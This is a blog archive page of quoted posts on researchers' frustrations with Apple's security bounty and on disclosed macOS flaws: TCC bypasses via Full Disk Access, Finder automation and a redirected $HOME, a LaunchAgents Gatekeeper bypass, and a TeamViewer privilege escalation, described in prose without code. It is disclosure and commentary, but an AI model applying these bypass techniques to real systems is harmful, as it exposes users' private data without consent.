Archive for July 13, 2021

Tuesday, July 13, 2021

More Trouble With the Apple Security Bounty

Nicolas Brunner (Hacker News):

In march 2020 I found a way to access a User’s location permanently and without consent on any iOS 13 (or older) device. This seemed like a critical issue to me — especially with Apple’s focus on privacy in the last years.

The report got accepted and the issue was fixed in iOS 14 and I got credited on the iOS 14 security content release notes. However, as of today, Apple refuses any bounty payment, although the report at hand very clearly qualifies according to their own guidelines. Also, Apple refuses to elaborate on why the report would not qualify.


Right now, I feel robbed. However I still hope, that the security bounty program turns out to be a win-win situation for both parties. In my current understanding however, I do not see any reason, why developers like myself should continue to contribute to it. In my case, Apple was very slow with responses (the entire process took 14 months), then turned me away without elaborating on the reasons and stopped answering e-mails.

Steve Troughton-Smith:

I’m not sure why one of the richest companies in the world feels like it needs to be so stingy with its bounty program; it feels far more like a way to keep security issues hidden & unfixed under NDA than a way to find & fix them.


If you did have knowledge of some major security flaws, why would you ever submit them to a bounty program if your last 10 submissions went nowhere and took months/years of fruitless email chasing? This stuff should be like clockwork

As an example: did you know any iOS app can read your iCloud account’s full name & email address without any kind of permissions prompt or access to your contacts? What about your phone number? Or recent searches in Photos? I figured this was worth a security report… in 2019

See also: Stop the Medium.


Update (2021-07-15): Csaba Fitzl (tweet):

Since Apple started their Apple Security Bounty program I have submitted around 50 cases to their product security team. I thought I will share my experiences working with Apple in the past 2 years. This will be useful to anyone thinking about participating in the program, and will help setting up expectations.


The issue is that even if you ask for an update, you don’t get any. Often times, it feels like I’m sending emails into a black hole. This is really frustrating. Even a reply like “we don’t have any update at the moment” would be nice, but often times that is also missed.


Although compared to many programs in H1 or BugCrowd, they are not an outlier here, but some cases can easily go over a year. Especially design issues, which are typically addressed only in the next major release (e.g.: macOS 12). I’m personally tracking 7 such cases.


Once the issue is fixed Apple will review the case and decide if it’s eligible for a bounty or not. I think this is the worse part of the whole process. This can take extremely long time, I have issues, which were fixed in the initial release of Big Sur (half year ago!) and a decision hasn’t been made yet. […] I think this is the part why you can’t rely on them for living, unless you have a buffer for a year or two.

Update (2021-07-26): Nick Heer:

Apple says that it pays one million dollars for a “zero-click remote chain with full kernel execution and persistence” — and 50% more than that for a zero-day in a beta version — pales compared to the two million dollars that Zerodium is paying for the same kind of exploit.


Security researchers should not have to grovel to get paid for reporting a vulnerability, no matter how small it may seem. Buy why would anyone put themselves through this process when there are plenty of companies out there paying far more?

The good news is that Apple can get most of the way toward fixing this problem by throwing money at it. Apple has deep pockets; it can keep increasing payouts until the grey market cannot possibly compete. That may seem overly simplistic, but at least this security problem is truly very simple for Apple to solve.


Overview of TCC Bypasses by Accident and Design

Phil Stokes (via Hacker News):

Full Disk Access means what it says: it can be set by one user with admin rights and it grants access to all users’ data system-wide. […] When Alice grants FDA permission to the Terminal for herself, all users now have FDA permission via the Terminal as well. The upshot is that Alice isn’t only granting herself the privilege to access others’ data, she’s granting others the privilege to access her data, too.

Surprisingly, Alice’s (no doubt) unintended permissiveness also extends to unprivileged users. As reported in CVE-2020-9771, allowing the Terminal to have Full Disk Access renders all data readable without any further security challenges: the entire disk can be mounted and read even by non-admin users. Exactly how this works is nicely laid out in this blog post here, but in short any user can create and mount a local snapshot of the system and read all other users’ data.


Because of this complication, administrators must be aware that even if they never grant FDA permissions, or even if they lock down Full Disk Access (perhaps via MDM solution), simply allowing an application to control the Finder in the ‘Automation’ pane will bypass those restrictions. […] Granting FDA in the usual way requires an administrator password. However, one can grant consent for automation of the Finder (and thus backdoor FDA) without a password.


Administrators need to be aware that TCC doesn’t protect against files being written to TCC protected areas by unprivileged processes, and similarly nor does it stop files so written from being read by those processes.


Bypassing TCC By Changing the Environment

Matt Shockley (tweet, Medium):

TCC stores these user-level entitlements in a SQLite3 database on disk at $HOME/Library/Application Support/ Apple uses a dedicated daemon, tccd, for each logged-in user (and one system level daemon) to handle TCC requests. These daemons sit idle until they receive an access request from the OS for an application attempting to access protected data


Obviously being able to write directly to the database completely defeats the purpose of TCC, so Apple protects this database itself with TCC and System Integrity Protection (SIP). Even a program running as root cannot modify this database unless it has the and entitlements. However, the database is still technically owned and readable/writeable by the currently running user, so as long as we can find a program with those entitlements, we can control the database.


Essentially, when the TCC daemon attempts to open the database, the program tries to directly open (or create if not already existing) the SQLite3 database at $HOME/Library/Application Support/ While this seems inconspicuous at first, it becomes more interesting when you realize that you can control the location that the TCC daemon reads and writes to if you can control what the $HOME environment variable contains. […] Thus, I could set the $HOME environment variable in launchctl to point to a directory I control, restart the TCC daemon, and then directly modify the TCC database to give myself every TCC entitlement available without ever prompting the end user.

So SIP is still protecting the normal path, but the system relies on tccd, which has been redirected to a different path. Apple fixed this 4.5 months later, in July 2020.

Patrick Wardle:

TCC continues to be a massive pain in the butt for legitimate software/app developers.

...but for hackers? Yah, not so much at all 😭😭😭😭😭

For example (as a legitimate soft dev), how can my updater tell if my app was already granted certain TCC privileges (so I don’t have to re-prompt the user)?

And why do I have to manually restart TCCd to avoid a myriad of (broken) caching issues?


Gatekeeper LaunchAgents Bypass

Csaba Fitzl:

On macOS Mojave Gatekeeper only verifies executables, which are run with the open command or the user double clicks. It won’t verify files, that are executed through other means like, directly executing a binary ./myapp regardless of the quarantine attribute. If you can place a plist file inside LaunchAgents/LaunchDaemons, the command inside will also be executed. Prior to Catalina there is a way to trick users to drag & drop files in the LaunchAgents folder.

On macOS Catalina lot has changed, the most notable one regarding gatekeeper is that it will verify files when executed via classic ‘exec’ methods.

I don’t think that the suggested drag install trick works because it’s impossible to make a single symlink for every user’s home folder, each of which has a different username.

TeamViewer Local Privilege Escalation Vulnerability

Csaba Fitzl (tweet):

This is a rather old vulnerability I found in TeamViewer back in 2020, and reported it through VCP/iDefense. TeamViewer fixed the vulnerability last November[…]

The TeamViewer macOS client used a PrivilegedHelperTool named com.teamviewer.Helper to perform specific tasks that require root permissions. Back in 2020 it used a deprecate model to perform IPC communication, called Distributed Objects. It was wide open, and any client could invoke the remote object’s functions, and some of those lead to direct privilege escalation.